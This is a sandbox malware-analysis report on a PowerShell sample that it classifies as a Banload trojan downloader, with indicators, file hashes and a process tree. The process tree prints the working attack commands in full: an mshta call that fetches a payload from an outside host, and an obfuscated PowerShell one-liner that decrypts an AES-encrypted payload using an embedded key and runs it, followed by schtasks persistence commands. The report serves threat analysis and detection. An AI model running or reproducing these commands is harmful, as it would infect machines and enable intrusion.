Overview

overview

10

Static

static

1

target.ps1

windows7-x64

10

target.ps1

windows10-2004-x64

10

Resubmissions

05-05-2024 18:11

240505-wsw3naca68 10

05-05-2024 18:02

240505-wmn5vsbh37 10

Analysis

  • max time kernel
    141s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-05-2024 18:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    target.ps1

  • Size

    154B

  • MD5

    e92339c8a8820df2920d180ffcc66d45

  • SHA1

    23968fbc5ae4fdf48fd699dcfee8c417317b0444

  • SHA256

    15c486428ca6ef7add4c57355497f270f2a38ed43c40b994933d67d5f7e664fc

  • SHA512

    dba5d0942a75a139fb5c5d67f8421fa0bb3c6f351554677117c46a9136cd12d4940ca80ef94796dfc578dbe81000c08d02ac19709453b26ac810e0d1b6db7abe

Score
10/10
banloaddownloaderdropperevasionexecutionpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://fatodex.b-cdn.net/fatodex

Signatures

  • Banload

    Banload variants download malicious files, then install and execute the files.

    trojandropperdownloaderbanload
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Blocklisted process makes network request 5 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Registers COM server for autorun 1 TTPs 3 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\target.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . mshta.exe https://fatodex.b-cdn.net/fatodex
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function DREeX($LWLOOBaM){return -split ($LWLOOBaM -replace '..', '0x$& ')};$zJmEepa = DREeX('FB7B0A5BDDA8D362B80F07A7D5531D62B890251A285AA2B74CC1546CE957F65F77729D219F4EADB2C7AB5DA5C639642B264AC843F39FEAC517124A3BD072157E8B0F5DDBAD3A23698D69AB8244E7FDADC3F0B728435A74338C3B2BE898C36E1ADDE3B7780A2581385C9EEF7A7023553CB81BB1D64D489F562A0D200979C2F862D1ED963CA439C0DA86325411C79282C993B218CC6AC4D7C5B954225AF8207E74F3D8B246D464DDD4056A464200169365A1BA93AD1D4F260F5CDC38F2F258DCA1CFA0FBACD4CAA6F170CD9D5A8F4936B0580C5F72019A310EE8DAB39636BE7497FFBB2FA76336995A7498BC08EF0786E8D4EB4E2C2C8472B7D5E11B98E9F1D2F2B183F47F74C55D2953DEFA3608201A996280A40D4EA4032E3669283D502A6E7252566A2D300105C002F81CC2866CE4152A31C581425E2B339F5F6F277699B4B8640F274142A93C1133B07BCB2E1F36DCD4C18B1197339F5525C053848BE907825F35C4E0C5A192603F5BA473C6A6A62CD50BB1E8C8685B81DFA3B8047E04A954F181E7A82DA5844DB8F49BDF9F3D99665AD21B7925C0CDA1D44A1699FB707A3E1601843F6D7352308FCA948DB1A6AF19EB190A40B042C5CF55609615A59DA120448E63BB063176F5EB8480DD7ACF5D097CB386C4739480B67CFC8CECE7B1330079CB99A3E93FC9FD1EEC630380EAB351099652CDA6291B5CE11728956207D0A91DF6E6B19A54B8C65823EDD58C01E3B61A530570B4E5636F72E1492A0F83A978263E6D673DA1323F5623309337CFBF6A6BB86B4BF0B447D138CD10B26CC88309482F1FAB27C173DC34E79355F6C96539A109E145C56AD83F3B9B1FC2C296944C28B30F823741192FECC5EB45A6DAA70BF003F5210661CB16A24AB96922AEEDE06FE83B56254652DE87231038E9EEA68B6754C9766B30DBDAD6E7C20EF3786EC16CCBFFABC3FBA56DD3FA266FCD53458AFFE6CA169B09AA60814707DC7F5D62CA7D1E2BE6330DF024EA5A74F5B57D3D3FF3E9190852F20C649E126447D4CFE3772F9D29027C6E1CB98B3D0723502F19AF23EDA46CED4F9B22CCA2F947F0548364D409371682A086BD0FFC9F9699C954B714001024A4138F4BCDE21BF8BDCDEC63500409CA9AA12E7E8F73DE0681FED9B5C40375F0946521ABA6A8F96AA3A0AABDA6DEF8EAFAC4B49CDC0AA4991B63E86772965327311FDCDE98E2F5CEE70A5C5B8BF0DACD25AAE74E8A61F0C7A0622702E07413EAB584C62E1830D4260C33B00255A792BA352A5541EF164FF19F5DA6BFDF3B94290EFD09F5740C700A4E39037637B12C655646F4871D1019860586EEB24B6D1F17342258F188A4F2ECD6FC30737FDC38CCEB5C71C8578E84F7AD87EE859D1F0322C63EDFE9B9B3879F23D30E170B928E0B6644178DB6DE7E8926462CAD8E02DF2561FFE1BA1003E935C3E0F8426B78DD1F22A46B822F120308FEF67306B27298B7F37B82B6858A5BE16C1AF3728B421001B4A9C32FCE1ADE7D21DA1E7B44741C84458F77DA704AE26195B5684E633D1FD8E0C16501F1D74B4927F81C3457044D2338F2B2BACCB8F5314EAD6AE0D81DF18E3DD624B5ED9E07BACC1E1C8A5E3FA1E81C0E284045ED57FF3C5CDB185EE57540E91C0D79689DF28FBB4CE70104BFF39D65F4D91D0555B4E91FF9D14CC1735CC6C0654CD94CC9E129936C0B35EA7E45F869FD27FE21DBC8DB119B48C4F3A2282F751EE41BC616CF285B8DF1CE0367080E9D2CB822579E1E960C0C05CA2464B9D5C40D1279C17F38B10F14B960F347BAE6F8568252DFCE7197A4B9471A0F5FCBE581A11082C99976091BEB2C2ACE9185A223249D95DEA4BFD57CDE2C392E017609CCCC7A1D8CBDF2BAD732E614039F339D60BFD82F34C75D10446028FF33BC5197D05CEA8A943490ED864C6D94');$dOmDq = [System.Security.Cryptography.Aes]::Create();$dOmDq.Key = DREeX('47527379546E7A6A4656756270556B4E');$dOmDq.IV = New-Object byte[] 16;$RuOilBnC = $dOmDq.CreateDecryptor();$gmaSVzrdz = $RuOilBnC.TransformFinalBlock($zJmEepa, 0, $zJmEepa.Length);$HbnJsGINd = [System.Text.Encoding]::Utf8.GetString($gmaSVzrdz);$RuOilBnC.Dispose();& $HbnJsGINd.Substring(0,3) $HbnJsGINd.Substring(3)
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\Users\Admin\AppData\Roaming\jdhw.exe
            "C:\Users\Admin\AppData\Roaming\jdhw.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Registers COM server for autorun
            • Suspicious use of SetThreadContext
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:4856
            • C:\Windows\SysWOW64\more.com
              C:\Windows\SysWOW64\more.com
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:916
              • C:\Windows\SysWOW64\regsvr32.exe
                C:\Windows\SysWOW64\regsvr32.exe
                7⤵
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:4956
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c expand.exe "C:\Users\Admin\AppData\Roaming\ServiceData\c2Gt4H.tmp" -F:* "C:\Users\Admin\AppData\Roaming\ServiceData"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3980
                  • C:\Windows\SysWOW64\expand.exe
                    expand.exe "C:\Users\Admin\AppData\Roaming\ServiceData\c2Gt4H.tmp" -F:* "C:\Users\Admin\AppData\Roaming\ServiceData"
                    9⤵
                    • Drops file in Windows directory
                    PID:1460
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c schtasks /create /tn \Service\Data /tr """"C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe""" """C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.jpg"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2612
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn \Service\Data /tr """"C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe""" """C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.jpg"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                    9⤵
                    • Creates scheduled task(s)
                    PID:4664
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3644 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:4128
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3124 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:3
      1⤵
        PID:3708
      • C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe
        C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe "C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.jpg"
        1⤵
        • Executes dropped EXE
        PID:1872

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
        Filesize

        2B

        MD5

        d751713988987e9331980363e24189ce

        SHA1

        97d170e1550eee4afc0af065b78cda302a97674c

        SHA256

        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

        SHA512

        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
        Filesize

        40B

        MD5

        20d4b8fa017a12a108c87f540836e250

        SHA1

        1ac617fac131262b6d3ce1f52f5907e31d5f6f00

        SHA256

        6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

        SHA512

        507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        0ff7e1af4cc86e108eef582452b35523

        SHA1

        c2ccf2811d56c3a3a58dced2b07f95076c6b5b96

        SHA256

        62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0

        SHA512

        374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\4c43f42c
        Filesize

        1.4MB

        MD5

        086a029c42eb3d87be810cf59eb7485f

        SHA1

        a37f1dad252f0f0f87eacc330a024ff08fbd784c

        SHA256

        c759307db5b0cbc6f735a3f8cf6e03f0674d26694a451a748048c910d611cd10

        SHA512

        cf5ceff6468989c19b51dc42c016fc97b4b643ea34cf6bb571fbadc9d22884e0781fb6ee2ced549529a05c5b20ce374320450a689f2360c43f36a9661e028721

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blkmkrgr.qcl.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe
        Filesize

        925KB

        MD5

        0adb9b817f1df7807576c2d7068dd931

        SHA1

        4a1b94a9a5113106f40cd8ea724703734d15f118

        SHA256

        98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b

        SHA512

        883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.jpg
        Filesize

        495KB

        MD5

        b36280ab2514b1772d2058fe14633850

        SHA1

        57b4b40365eb4e26aa9f9125acc9965210776195

        SHA256

        a3b628be13ef3a1f09ab8e4af4f59203e7e721283bd9414f2a35c03abd0ecf46

        SHA512

        7c13c658c2be4430aa7e6fa4a6b6116a91e5cf5c9ce425eb698236193b96d12656d264ce3f19940a17b8a59f7b7e5dfb1ea0c0c9dc381a788c3acf4f8fdfddfa

        Download Submit

      • C:\Users\Admin\AppData\Roaming\acdbase.dll
        Filesize

        2.9MB

        MD5

        dace23695dcfa0f7309b65366ac75bc0

        SHA1

        c5b1bad2dec36852fae90f81f0dbd00518479c01

        SHA256

        cf8b85beeff99b13d06ed15c79e555ab74e30dfa1491a36c4332f54ed09887e4

        SHA512

        0e1e5fc158fb39c3c3c7733226cb846407cd01ca1c49800fb7668134ebef129ab43030f2768a8b149b5ba9a18b2d1b0f8bf23d1a8de487a482e9268e0b679bbb

        Download Submit

      • C:\Users\Admin\AppData\Roaming\api-ms-win-crt-convert-l1-1-0.dll
        Filesize

        25KB

        MD5

        9f812bd3815909e559b15cb13489f294

        SHA1

        df751c956f59b4e3c82496d86895adc7cc1a1619

        SHA256

        ce6fcc2ddf21720c92bee04f5736a4787acffa970a1b0dbeea39ff5efec52c75

        SHA512

        0a360e8b81bf80cb6bdf240d627ddcf71b1a4ca42759de61b2d27fab521a8e6e3afa308cc69caf5a7c8b14d98d3d448f0d400ae1826cbe7d0f0ceafd14682064

        Download Submit

      • C:\Users\Admin\AppData\Roaming\api-ms-win-crt-environment-l1-1-0.dll
        Filesize

        21KB

        MD5

        1a72e5f24214eb723e03a22ff53f8a22

        SHA1

        578d1dbfb22e9ff3b10c095d6a06acaf15469709

        SHA256

        fda46141c236a11054d4d3756a36da4412c82dd7877daad86cb65bf53d81ca1a

        SHA512

        530e693daecc7c7080b21e39b856c538bb755516aafdb6839a23768f40bcfc38d71b19586e8c8e37bb1c2b7a7c31fcb8e24a2315a8dd90f50fec22f973d86cb4

        Download Submit

      • C:\Users\Admin\AppData\Roaming\api-ms-win-crt-heap-l1-1-0.dll
        Filesize

        21KB

        MD5

        9d136bbecf98a931e6371346059b5626

        SHA1

        2466e66bfd88dd66c1c693cbb95ea8a91b9558cd

        SHA256

        7617838af1b589f57e4fe9fee1e1412101878e6d3287cdc52a51cd03e3983717

        SHA512

        8c720c798d2a06f48b106a0a1ef38be9b4a2aebe2a657c8721278afa9fdbab9da2a672f47b7996ca1ce7517015d361d77963c686e0ae637a98c32fd75e5d0610

        Download Submit

      • C:\Users\Admin\AppData\Roaming\api-ms-win-crt-runtime-l1-1-0.dll
        Filesize

        25KB

        MD5

        6b39d005deb6c5ef2c9dd9e013b32252

        SHA1

        79a0736454befd88ba8d6bd88794d07712e38a67

        SHA256

        b0e50572eb82a46ed499775e95bfde7cb25c498957432c18c20cf930f332efd0

        SHA512

        50bc1f669499589a480379d72166dae701914427d51223994d63a0363420ca6fdde07010803270a62451afea9e4ae55206d8a4c00ca4680e7a9120cd33f99a0f

        Download Submit

      • C:\Users\Admin\AppData\Roaming\api-ms-win-crt-stdio-l1-1-0.dll
        Filesize

        25KB

        MD5

        97f24295c9bd6e1acae0c391e68a64cf

        SHA1

        75700dce304c45ec330a9405523f0f22e5dcbb18

        SHA256

        189d551fb3cba3dbb9b9c1797e127a52ac486d996f0ac7cba864fe35984a8d28

        SHA512

        cac75f623545c41b2597a25c14f2af7eb93e3e768b345d3b0e1928d8fd1f12bec39b18b8277f9550aa6a66d9cfe1bf6c3db93ae1eb2a6c07019d4f210b3e5998

        Download Submit

      • C:\Users\Admin\AppData\Roaming\api-ms-win-crt-string-l1-1-0.dll
        Filesize

        25KB

        MD5

        d282a4fa046d05d40d138cc68c518914

        SHA1

        d5012090399f405ffe7d2fed09650e3544528322

        SHA256

        8b1471101145343da5f2c5981c515da4dfae783622ed71d40693fe59c3088d7a

        SHA512

        718926e728627f67ba60a391339b784accd861a15596f90d7f4e6292709ac3d170bcbca3cbf6267635136cb00b4f93da7dfd219fa0beee0cf8d95ce7090409e4

        Download Submit

      • C:\Users\Admin\AppData\Roaming\api-ms-win-crt-time-l1-1-0.dll
        Filesize

        21KB

        MD5

        6d35a57a6d8d569f870b96e00e7f1f4d

        SHA1

        8407bdb3cd5ec15b2ce738b3dbd704aa289ce3e1

        SHA256

        f41511e477a164eb9451ca51fb3810437f3b15f21e6f5c6ce0956e84ec823723

        SHA512

        4317b86d32ca93e5f0d832819cf1ab8af68e853a19eb07dd1fa4d168a0b2a8eab309194884ed3a613b09fc6d511be872a053f76f00ea443499006cdd226fea8f

        Download Submit

      • C:\Users\Admin\AppData\Roaming\api-ms-win-crt-utility-l1-1-0.dll
        Filesize

        21KB

        MD5

        8ed70910380aa0b28317512d72762cc0

        SHA1

        0421518370f24f9559f96459d0798d98b81ea732

        SHA256

        f15af0db93d9385ff9d8efdc06aacd0729d0dfcb66e91ca0243bb160f2ed89d0

        SHA512

        b31ef07eaac310fdd3df3546246e7dc696595b8e92141e3db79a44ddc3358b12129e3829a53c76d0fef214e3f29dba77fa5d556211830a140ea34ff62258d9d7

        Download Submit

      • C:\Users\Admin\AppData\Roaming\callup.zip
        Filesize

        1.1MB

        MD5

        daa5d063fd362d8cd05dcb53b325d7d5

        SHA1

        88633bf31cbdc381c7a9a0e4321546de3eca7720

        SHA256

        2d5782626d017e182a02c5a21466310fb5d8b73ab215c62cdc165ba27707e802

        SHA512

        141c54a4d88ef01581f3a96961c3542b0115b2aa9448d768ab288ccdeefceaa38ec59a64afe00f2ff4d93fa4043b92c9ec4cd769a0fa4cf1943b2090042e9464

        Download Submit

      • C:\Users\Admin\AppData\Roaming\jdhw.exe
        Filesize

        8.5MB

        MD5

        98169506fec94c2b12ba9930ad704515

        SHA1

        bce662a9fb94551f648ba2d7e29659957fd6a428

        SHA256

        9b8a5b0a45adf843e24214b46c285e44e73bc6eaf9e2a3b2c14a6d93ae541363

        SHA512

        7f4f7ac2326a1a8b7afc72822dae328753578eb0a4ffcec5adb4e4fb0c49703070f71e7411df221ee9f44d6b43a0a94921fe530877c5d5e71640b807e96def30

        Download Submit

      • C:\Users\Admin\AppData\Roaming\leap.zip
        Filesize

        45KB

        MD5

        08f543471fca769417d792fa915ec287

        SHA1

        e1b010978178cfa854ebcbd7db2c7fd05cb1e267

        SHA256

        42fa279d41b30afdd4a016c64d64ea5967417179912e2d471be18a0a850d1cae

        SHA512

        a61a0310910a46dfd1755699eb5abae608572af0b0e5e7fd5faf9501f2c4d05e60d07a1886fd5c33c1d0730dd8c99993cf29086bbe052f226a0528445ebe4a2d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\libmmd.dll
        Filesize

        4.0MB

        MD5

        f3918c71ae05882f8d47b776596dc5f2

        SHA1

        36e52c01b24db9d2daa36cf76697e5612d5c1470

        SHA256

        16a5bc32f74bbb0c1919cd18ce1cd64dfcf6a6ba90c35c9dd44791c3f464c17a

        SHA512

        45db3576b3ce685e361905d2fd8ecc96d8b7157d7113e6d41922dc5dbc04ace62ace113c09eeba36a6e4c70f94e39a1dadea4a39cf6cc7e87af166e14000af5a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\vcruntime140.dll
        Filesize

        116KB

        MD5

        699dd61122d91e80abdfcc396ce0ec10

        SHA1

        7b23a6562e78e1d4be2a16fc7044bdcea724855e

        SHA256

        f843cd00d9aff9a902dd7c98d6137639a10bd84904d81a085c28a3b29f8223c1

        SHA512

        2517e52f7f03580afd8f928c767d264033a191e831a78eed454ea35c9514c0f0df127f49a306088d766908af7880f713f5009c31ce6b0b1e4d0b67e49447bfff

        Download Submit

      • \??\c:\users\admin\appdata\roaming\servicedata\c2gt4h.tmp
        Filesize

        491KB

        MD5

        9533ba8d9930f60f0b6257bdb79b2384

        SHA1

        b0b9dc920e83343784e818dcf4d9607de51118bb

        SHA256

        6a30579a54855ff5899cd73278d61e6b3d69abadc7ffedc6c0e0c3aa03594131

        SHA512

        e86c782b98b28e8eefc03cb703eb2c640d6b748285b76c93f8a892e2427a20de00c7dd4c141e1c38e69b2f78b54f6705e2ae40071aaba0392193fc1a7071259d

        Download Submit

      • memory/916-421-0x00007FF8B33F0000-0x00007FF8B35E5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/916-422-0x0000000075450000-0x00000000755CB000-memory.dmp

        Filesize

        1.5MB

        Download

      • memory/1776-56-0x000001E43E2D0000-0x000001E43E2DA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/1776-55-0x000001E43E2B0000-0x000001E43E2C2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2128-23-0x00007FF894140000-0x00007FF894C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2128-24-0x00007FF894140000-0x00007FF894C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2128-27-0x00007FF894140000-0x00007FF894C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2128-28-0x00007FF894140000-0x00007FF894C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2252-11-0x00007FF894140000-0x00007FF894C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2252-12-0x00007FF894140000-0x00007FF894C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2252-13-0x00007FF894140000-0x00007FF894C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2252-6-0x0000024248940000-0x0000024248962000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2252-0-0x00007FF894143000-0x00007FF894145000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2252-33-0x00007FF894140000-0x00007FF894C01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4856-418-0x00007FF894740000-0x00007FF8948B2000-memory.dmp

        Filesize

        1.4MB

        Download

      • memory/4856-396-0x00007FF894740000-0x00007FF8948B2000-memory.dmp

        Filesize

        1.4MB

        Download

      • memory/4856-368-0x0000000004060000-0x0000000004248000-memory.dmp

        Filesize

        1.9MB

        Download

      • memory/4856-378-0x0000000000400000-0x0000000001CF7000-memory.dmp

        Filesize

        25.0MB

        Download

      • memory/4856-386-0x0000000000400000-0x0000000001CF7000-memory.dmp

        Filesize

        25.0MB

        Download

      • memory/4856-384-0x0000000000400000-0x0000000001CF7000-memory.dmp

        Filesize

        25.0MB

        Download

      • memory/4856-387-0x0000000000400000-0x0000000001CF7000-memory.dmp

        Filesize

        25.0MB

        Download

      • memory/4856-382-0x0000000000400000-0x0000000001CF7000-memory.dmp

        Filesize

        25.0MB

        Download

      • memory/4856-380-0x0000000000400000-0x0000000001CF7000-memory.dmp

        Filesize

        25.0MB

        Download

      • memory/4856-383-0x0000000000400000-0x0000000001CF7000-memory.dmp

        Filesize

        25.0MB

        Download

      • memory/4956-429-0x0000000000A40000-0x0000000001175000-memory.dmp

        Filesize

        7.2MB

        Download

      • memory/4956-428-0x0000000000A40000-0x0000000001175000-memory.dmp

        Filesize

        7.2MB

        Download

      • memory/4956-445-0x0000000000A40000-0x0000000001175000-memory.dmp

        Filesize

        7.2MB

        Download

      • memory/4956-446-0x0000000000A40000-0x0000000001175000-memory.dmp

        Filesize

        7.2MB

        Download

      • memory/4956-426-0x0000000000A40000-0x0000000001175000-memory.dmp

        Filesize

        7.2MB

        Download

      • memory/4956-425-0x00007FF8B33F0000-0x00007FF8B35E5000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/4956-424-0x0000000074110000-0x0000000075364000-memory.dmp

        Filesize

        18.3MB

        Download